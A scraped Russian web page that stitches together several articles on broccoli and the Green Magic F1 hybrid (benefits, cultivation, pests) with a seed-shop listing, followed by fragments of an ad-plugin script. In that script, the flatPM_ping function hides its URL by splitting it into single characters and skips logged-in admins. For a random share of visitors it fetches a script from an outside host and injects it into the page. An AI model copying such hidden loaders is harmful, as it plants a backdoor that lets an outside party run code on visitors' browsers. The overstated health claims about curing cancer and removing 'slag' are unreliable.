1 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Описание капусты брокколи грин мэджик

Брокколи (капуста)

Брокколи – это разновидность капусты, относится к семейству крестоцветных. Однолетнее растение хорошо растет на открытых солнечных участках. Что такое брокколи? Чем полезен овощ для человека? Как правильно выращивать капусту? Это, а также обзор популярных сортов, сколько дней созревает овощ, рассмотрим в рамках данной статьи.

Описание капусты брокколи

Родиной брокколи считается Малая Азия и Восточное Средиземноморье. С итальянского «брокко» переводится как побег, ветка.

Как выглядит брокколи, характеристика:

  • Взрослое растение – 60-90 см в высоту;
  • На конце стебля формируются рыхлые головки темно-зеленого или фиолетово-зеленого цвета, которые употребляют в еду;
  • Зеленые головки срезают до периода пожелтения цветков;
  • Когда прищипывают зелень, начинают формироваться новые почки, поэтому брокколи плодоносит весь сезон;
  • Калорийность капусты – 34 ккал/100 грамм;
  • По внешнему виду овощ напоминает цветную капусту.

Капусту брокколи ценят за аппетитный аромат, приятный нежный вкус и полезные свойства. Овощ считается кладезем витаминов. В нем содержатся витамины и минералы.

Брокколи состав:

Благодаря высокому содержанию витамина С в составе капусты, она является хорошим антиоксидантом. В белке брокколи очень много жизненно важных аминокислот. Брокколи по питательности можно сравнить с говяжьим мясом или с куриным белком.

Брокколи содержит много витаминов и минералов

Полезные свойства

По содержанию полезных микроэлементов брокколи находится на ведущем месте. Витамины и минералы выполняют важную роль для человека. Взаимодействуя друг с другом, они оказывают положительное влияние на здоровье.

Чем полезна брокколи:

  • Витамин U используется для лечения и профилактики язвенных заболеваний желудка;
  • Калий отвечает за выведение лишних солей из организма;
  • Кальций делает волосы и ногти здоровыми;
  • Магний благотворно влияет на работу сердечно-сосудистой системы;
  • Селен выводит шлаки, тяжелые металлы.

В брокколи содержится бета-каротин – микроэлемент красоты, здоровья и молодости. Аминокислоты способствуют выработке эндорфина.

В белке зеленых головок содержится белок, который приравнивают к мясу или куриному яйцу из-за высокого содержания лизина и изолейцина. По сравнению с продуктами животного происхождения, в белке брокколи отсутствует холестерин. В составе имеются вещества, которые помогают выводить вредные органические соединения.

Дополнительная информация!Брокколи рекомендуется включать в меню людям с болезнями сердца, сердечно-сосудистой системы. Полезные свойства брокколи используются в качестве профилактики инсультов и инфаркта.

В продукте содержится клетчатка, которая позволяет нормализовать процессы ЖКТ, очищая кишечник. Брокколи участвует в процессе выделения желчи, облегчает работу желчевыводящих органов.

Брокколи – обязательный продукт в меню у диабетиков. В овоще присутствуют вещества, которые нормализуют уровень инсулина в крови, защищают стенки сосудов.

Брокколи – обязательный продукт в меню у диабетиков

При проблемах с нервной системой показано регулярное употребление в пищу брокколи. Физиологически активные компоненты положительно воздействуют на сердечные мышцы и нервную систему.

Большое содержание каротина в составе брокколи способствует укреплению сетчатки и хрусталика глаза.

Отвар из семян капусты применяется против глистной инвазии.

Регулярное употребление в пищу овоща благотворно влияет на состояние кожи. Брокколи выводит из организма шлаки, свободные радикалы, отмершие клетки.

Обратите внимание!В зеленых головках содержится фолиевая кислота, которая необходима беременным женщинам для нормального формирования и развития плода.

Брокколи используется при профилактике раковых заболеваний. В составе капусты имеется сульфорафан. Вещество способно замедлять и останавливать развитие раковых новообразований.

Противопоказания к употреблению брокколи

Несмотря на массу полезных свойств капусты, есть случаи, когда употреблять брокколи нежелательно.

Что вредного содержится в брокколи и может быть опасным для здоровья:

  • Не используют для приготовления блюд отвар от капусты. В нем присутствуют аденин и гуанин – вещества, вредные для организма. Поэтому при приготовлении овощных супов не рекомендуется долго отваривать головки. При длительной термической обработке теряются полезные свойства овоща;
  • Большой вред от брокколи организму можно нанести, если употреблять головки, обжаренные в масле на сильном огне. В процессе жарки образуются канцерогены, которые негативно влияют на здоровье;
  • Осторожно рекомендуется употреблять в пищу сырой овощ людям с заболевания ЖКТ. При повышенной кислотности желудка нежелательно включать в рацион свежую капусту.

Виды брокколи

Различают два основных вида, по тому, как выглядит капуста брокколи:

  • Калабрез – наиболее распространённый вид. Кочан состоит из большого числа плотных соцветий темно-зеленого цвета на толстом стебле;
  • Итальянская или спаржевая брокколи – на растении формируются стебли с маленькими рыхлыми головками. В пищу употребляют стебли. По вкусу они напоминают спаржу.

Известно больше 200 сортов брокколи.

В российском Госреестре записано 5 сортов:

  • Тонус – раннеспелый сорт. Головки темно-зеленого цвета. Особенность сорта – дружное созревание и отрастание боковых почек;
  • Линда – среднеспелый сорт с крупными головками. Вес головок достигает 500 г. Цвет капусты темно-зеленый. В местах среза образуются новые боковые головки;
  • Фиеста – среднеспелый сорт капусты. На стебле формируются плотные зеленые головки, после среза боковые почки не отрастают;
  • Аркадия – среднеспелый гибрид, растение развивается и комфортно себя чувствует даже при пониженной температуре. Головки серо-зеленого цвета, плотные, крупные;
  • Монтерей – среднепоздний гибрид с крупной центральной головкой темно-зеленого цвета. Вес может достигать 1,9 кг.

Кроме перечисленных сортов, на российском рынке в продаже имеются следующие разновидности брокколи:

  • Вярус;
  • Грин спроутинг;
  • Аркадия F1;
  • Император F1;
  • Корвет F1;
  • Лазер F1;
  • Фиеста F1;
  • Атлантик;
  • Генуи;
  • Гном.

Брокколи сорта «Вярус»

Зеленая капуста брокколи

Разновидность капусты отличается от остальных своей питательностью и витаминным составом. Зеленый цвет капусты свидетельствует о высоком содержании витамина С.

Сорта зеленой капусты брокколи отличаются:

  • По срокам созревания;
  • Структуре и оттенку головок;
  • Весу плодов;
  • Правилам агротехники;
  • Вкусовым характеристикам.

Сорта следует выбирать по двум критериям:

  • Срок созревания. Ранние сорта можно собирать через 50 дней после высадки в открытый грунт, а поздние могут расти 140 дней и более. Поэтому важно подбирать гибрид, учитывая климатические условия местности;
  • Урожайность. Капуста может хорошо расти и развиваться даже при плотной посадке. В зависимости от сорта, урожай колеблется от 1 до 7 кг с 1 кв. м.

Грин мэджик f1

Ранний гибрид капусты брокколи. Срок созревания с момента высадки рассады на участок – 2 месяца.

Ранний сорт «Грин мэджик f1»

Гибрид выращивают рассадным способом. Хорошо растет на плодородных землях, можно высаживать на суглинистых почвах. Семена, приобретенные в магазине, не требуется дополнительно обрабатывать, дезинфицировать.

На зрелом растении формируется куполообразная головка, насыщенного зеленого цвета. Средний вес головки – 400 г. Овощ имеет приятный нежный вкус.

Правила агротехники

Выращивание капусты брокколи из семян в домашних условиях под силу даже неопытным садоводам. В открытый грунт капусту высаживают готовой рассадой. За 5-6 недель до планируемой даты высадки на огород надо посеять семена брокколи для проращивания. Высаживать семенной материал можно дома в контейнеры или в теплицу. Рекомендуемая глубина посадки – 1 см, между семенами надо выдерживать расстояние – 2,5 см.

Перед посевом семян подготавливают грунт. Готовую питательную почвосмесь можно купить в магазине или сделать ее самостоятельно.

Если берется садовая земля, то ее необходимо обеззаразить:

  • За 1-2 недели прогреть почву на солнце;
  • За сутки до посева семян полить грунт слабым раствором марганцовки.

В почву добавляют золу, доломитовую муку и перегной. После высадки семян почву поливают способом дождевания, чтобы не размыть посадочный материал. Оптимальный температурный режим в помещении должен быть 20-22 градуса, после появления всходов ее можно снизить до 15 градусов. Почва должна быть умеренно увлажненной. Через 7-10 дней должны появиться ростки брокколи.

Дополнительная информация! Рассаду надо сажать в открытый грунт в возрасте 35-45 дней, начиная с середины мая. Капуста хорошо растет при температуре 16-25 градусов, переносит резкое понижение температуры до -7 градусов.

Участок под капусту надо подготовить с осени. Он должен быть ровным, на хорошо освещенной и прогреваемой стороне сада. Грядку очищают от сорняков, вносят органические и минеральные удобрения. Уровень кислотности должен быть слабым или нейтральным, поэтому при необходимости в почву добавляют известь или доломитовую муку. Азотные добавки на участок вносят весной перед высадкой рассады.

Уход за брокколи:

  • Умеренный полив;
  • Прополка;
  • Подкормка;
  • Рыхление;
  • Окучивание.

Внесение удобрение производят через 2 недели после высадки рассады. В почву вносят органические удобрения. Сбор урожая производят до распускания и пожелтения цветков. При срезе головок отрастают новые боковые побеги.

Удобрение для капусты

Лучшие сорта ранней капусты для Подмосковья

Ранними считаются сорта, период созревания которых составляет от 2 до 3 месяцев.

Наиболее популярные сорта капусты для средней полосы России:

  • Батавия F1 – один из лучших ранних сортов. Капуста с округлыми головками темно-зеленого цвета. Семена высаживают, начиная с середины марта. С 1 кв. м можно получить до 2,5 кг брокколи. Недостаток – небольшой срок хранения после сбора урожая;
  • Лорд F1 – высокоурожайный сорт с прекрасными вкусовыми характеристиками. Капуста созревает через 60 дней после высадки рассады в открытый грунт. Средний вес головки – 1,5 кг. Сорт отличается устойчивостью к мучнистой росе;
  • Витаминная – срок созревания составляет 75-80 дней. Средний вес кочана – 300 г. Урожай надо убирать, пока головки не стали рыхлыми. Свое название сорт получил из-за высокого содержания витаминов.

Брокколи – полезная и вкусная капуста, которую несложно вырастить на дачном участке. Химический состав брокколи делает овощ незаменимым продуктом питания, начиная с детского возраста. При выборе сорта важно ориентироваться на климатические особенности местности. Зная простые правила агротехники, как лучше вырастить брокколи на даче из семян и рекомендации по сбору и хранению урожая, можно самостоятельно заготовить впрок витаминный овощ для всей семьи.

Французский гибрид с прекрасным вкусом — капуста брокколи Грин Мэджик F1: отзывы и описание

Капуста брокколи Грин Мэджик F1 заслужила множество положительных откликов. Огородникам нравится не только ее прекрасный вкус и высокое содержание важных для организма веществ, но и неприхотливость, стойкость к неблагоприятным условиям и прекрасная урожайность. Помимо основного урожая, растения дают боковые соцветия.

Место посадки Сроки созревания Вид Предназначение Происхождение Период созревания Масса
Открытый грунт Раннеспелый Брокколи (спаржевая) В свежем виде, Заморозка, Консервирование, Кулинария, Переработка Гибрид 60-65 0,3-0,7

Описание и характеристика сорта

Гибрид брокколи Грин Мэджик F1 выведен во Франции. В России его можно выращивать в любых регионах, за исключением крайнего севера. Растение переносит морозы и жару, не трескается, адаптируется к почвам и рано созревает. От всхода семян до сбора первого урожая проходит 60-65 дней.

Растение одностеблевое, розетка листьев слегка приподнятая. В высоту все вместе достигает 25-30 см. Черешки листьев средние. Ботва и соцветия темно-зеленого цвета. Головки небольшие, по 300-700 г, эллиптической формы. Пустоты внутри отсутствуют.

Вкус приятный, применение универсальное. Брокколи можно есть в свежем виде, замораживать на зиму, перерабатывать и готовить различные блюда. В головках содержится много витаминов А и С, антиоксидантов, холестерин отсутствует. Овощ помогает в профилактике онкозаболеваний, способствует оздоровлению пищеварительной и сердечно-сосудистой систем и выведению токсинов.

Преимущества и недостатки

  • отличный вкус;
  • значительная польза для организма;
  • устойчивость к жаре и к холодам;
  • способность адаптироваться даже к бедным грунтам;
  • отличная урожайность;
  • раннеспелость;
  • головки не растрескиваются и не образуют пустот;
  • иммунитет к ложной мучнистой росе и некоторым другим болезням.

Минусы:

Урожайность

С 1 кв. м можно получить до 7 кг капусты вместе с урожаем от боковых побегов.

Посадка

В средней полосе брокколи выращивают рассадным способом, на юге допустима посадка семян в грунт.

Перед посевом семена рекомендуется обработать раствором марганцовки и замочить на 12 часов во влажной ткани (если они продавались без цветной оболочки). Сеют на глубину не более 2 см. Лучше всего использовать индивидуальные торфяные горшочки или таблетки. Питательный субстрат готовят из дерновой земли с торфом и песком.

После посева землю увлажняют и ставят емкости в теплое место.

После появления ростков держат горшочки в хорошо освещенном прохладном месте с температурой +16-18. Рыхлят почву, поливают по необходимости.

Грядку выбирают в тенистом месте или сооружают временные укрытия, чтобы защищать растения от ожогов солнца. Землю весной перекапывают, удобряют, проливают раствором марганцовки. Между растениями оставляют по 30-60 см.

Выращивание и уход

До образования головок поливают обильно, водой комнатной температуры, внося ее под корень. Однако нельзя давать корням закисать. После появления головок снижают количество воды и поливают реже. Для сохранения баланса влаги мульчируют почву сеном, соломой или торфом.

Подкармливают домашними и минеральными удобрениями. Молодым растениям полезны азотные органические подкормки – раствор коровяка, куриного помета, перебродившего настоя крапивы. Их разбавляют водой 1:10 и вносят во время полива по 0,5 л под куст. После завязывания головок однократно подкармливают минеральным комплексом или несколько раз – гуматными удобрениями.

Болезни и вредители

Гибрид наделен высоким иммунитетом и может сопротивляться ряду болезней, включая пероноспороз (ложную мучнистую росу). Он уязвим к киле, при неправильном уходе может болеть черной ножкой. Для защиты нужно:

  1. Соблюдать севооборот, не высаживать брокколи на участках после другой капусты, редьки, редиса.
  2. Перед посадкой рассады проливать лунки раствором марганцовки.
  3. Обрабатывать марганцовкой или специальными фунгицидами семена, почву для рассады и емкости.
  4. Поливать умеренно, не допускать излишней влажности.
  5. Не загущать посадки.

При появлении килы больные растения уничтожают сразу, а оставшиеся обрабатывают фунгицидами.

Из вредителей могут быть опасны гусеницы, слизни, капустная муха, крестоцветная блошка.

Против блошки еще до ее появления густо припудривают рассаду и почву вокруг нее древесной золой или табачной пылью. Регулярно повторяют. Против слизней и гусениц грунт густо посыпают толченой яичной скорлупой или красным перцем, смешанным с горчицей. При обнаружении яиц капустной мухи их уничтожают вручную, подсыпают к растениям свежей земли и припудривают ее древесной золой или гашеной известью.

Если вредителей слишком много, применяют инсектициды, но не позднее чем за две-три недели до сбора урожая.

Описание капусты брокколи Грин Мэджик

Волокна и клетчатка, содержащиеся в овощах, помогают процессу пищеварения и препятствуют накоплению шлаков. Особенно этому процессу способствует капуста брокколи Грин Мэджик.

Описание капусты брокколи Грин Мэджик

Характеристика сорта

Родина Грин Мэджик f1 — Франция.

  • ранние сроки созревания: период от первых всходов до достижения технической зрелости — 60-65 дней;
  • не образует пустоты в стебле;
  • адаптация практически к любым окружающим условиям и почве (в отличии от цветной капусты), поверхность кочанов не трескается ни в морозы, ни в жару;
  • устойчивость к грибковым инфекциям, особенно к ложной мучнистой росе;
  • высокая урожайность – от 2 до 2,5 кг на кв. м;
  • качественные и вкусные плоды;
  • насыщенность полезными веществами, особенно витаминами группы А и С.

Описание растения

Этот сорт брокколи гибридного происхождения. Его кудрявая головка полукруглой формы и ярко-зеленого цвета. Вес — от 300 до 700 г. Кроющие листья отсутствуют. Растение одностеблевое, мощное и развитое, формирует множество боковых побегов. Высота — 25-30 см.

Применение

Отсутствие в овоще холестерина и способность выводить токсины делает его диетическим продуктом и позволяет включать в рацион людей с сахарным диабетом и заболеваниями сердечно-сосудистой системы.

Свойство антиоксиданта помогает в качестве профилактики онкологии. Грин Мэджик используют в кулинарии в свежем виде, он подходит для переработки и заморозки, при этом сохраняет питательные свойства, применяется в производстве детского питания.

Выращивание культуры

На белорусских просторах брокколи выращивают рассадой. Выбирают средний и тяжелый грунт из смеси песка и глины, насыщенный перегноем.

Почва должна хорошо пропускать воду, чтобы не допустить застоя, иначе вероятно заражение грибками. Место для посадки подойдет полутемное, защищенное от прямого попадания солнечных лучей. Идеальная температура для роста брокколи — 19-22°C.

Рассаду высаживают в середине мая

Капустные семена не нуждаются в предварительной обработке перед высадкой в почву, максимум — в замачивании во влажной ткани. Отбирают наиболее крупные экземпляры без повреждений и дефектов. Посев проводят в середине апреля-начале мая, высаживание рассады — в середине-конце мая, урожай же брокколи собирают в конце июля-середине августа, в некоторых местностях только к сентябрю.

Семя опускают в землю на глубину 1-2,5 см по схеме 75 × 25 см. Расстояние между кустами должно составлять от 30 до 60 см. Желательная плотность посадки — 35-45 тыс. экземпляров на 1 га. Рассаду укрывают сверху пленкой. Высаживаемые растения углубляют до первого листа. Головки прячут до цветения.

Лучшими предшествующими культурами признаны томаты, лук, пасленовые, бобовые.

Уход за рассадой

Грин Мэджик быстро приспосабливается к новым условиям. Правила ухода:

  • Обильный полив при высадке и росте головок, далее частоту орошений уменьшают.
  • Добавление в лунки по горсти перегноя и золы в процессе высадки.
  • Мульчирование после посадки и полива, чтобы почва не сохла и не перегревалась, это также помогает предотвратить рост сорняков

Болезни и вредители

Основной враг — черная ножка или кила. Во избежание ее развития брокколи не высаживают на место, где ранее росли крестоцветные: не рекомендуется делать посадки чересчур густыми.

Чтобы уберечь рассаду от слизней, вокруг растений крошат перемолотую яичную скорлупу. Прогнать гусениц помогают высаженные по соседству бархатцы. Профилактика появления около рассады этих ползучих насекомых позволяет уберечь от ручной их уборки в случае атаки.

Для защиты от крестоцветных блошек листья посылают золой или табаком.

Капуста брокколи Грин Мэджик F1, 10 семян

Ранняя капуста брокколи Грин Мэджик F1 (10 семян)

Подгруппа: Брокколи — капуста

Производство: Sakata (Япония)

Цена при заказе от 20 шт.: 44 руб.

Способы получения товара

Курьером по городу Москва — 280 р.

Ближайшая дата доставки: 31 декабря

Курьером через службу — Grastin от от 1 дн.

Курьером через службу — Boxberry от от

Курьером через службу — Hermes от от

Самовывоз от 0 руб. Посмотреть расположение магазина на карте

Почтой по России — от 9%

Возможна курьерская доставка: в Москве, в Санкт-Петербурге, в Хабаровске

Остаток товара ‘Серия ЭЛИТ: Капуста брокколи Грин Мэджик F1 10 семян’ в розничных магазинах в регионе Москва

Возможность покупки товара без предварительного заказа на сайте

Остатки — АКТУАЛЬНЫЕ, обновляются в реальном времени!

Магазин «Перово»Магазин «Новогиреево»Магазин «Нахимовский»Магазин «Университет»Магазин «Сходненская»Магазин «Коломенская»Магазин «Коньково»Магазин «Жулебино»Магазин «Озерная»Магазин «Медведково»
Магазин Наличие
9
3
3
3
2
3
3
3
3
3
Наименование Произ-во Цена Количество семян
Капуста брокколи Батавия F1 (10 семян) Россия 28 10
Капуста брокколи Лорд F1 (10 семян) Россия 30 10
Капуста брокколи Фиеста F1 (10 семян) Россия 28 10
Капуста брокколи Амеро F1 (10 семян) Россия 28 10
Капуста брокколи Агасси F1 ЭЛИТ (10 семян) Россия 45 10
Капуста брокколи Грин Мэджик F1 ЭЛИТ (10 семян) Россия 45 10

Вы можете купить ‘Серия ЭЛИТ: Капуста брокколи Грин Мэджик F1 10 семян’ оптом в нашей фирме, предлагаем выдержку из оптового прайса:

Наименование Опт от 10000 рублей Опт от 50000 рублей Опт от 100000 рублей Опт от 200000 рублей
Капуста брокколи Грин Мэджик F1, 10 семян 43 42 41 40

Скачайте файлы к Капуста брокколи Грин Мэджик F1, 10 семян

Сорт капусты брокколи Грин Мэджик F1 — подробное описание

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
×
×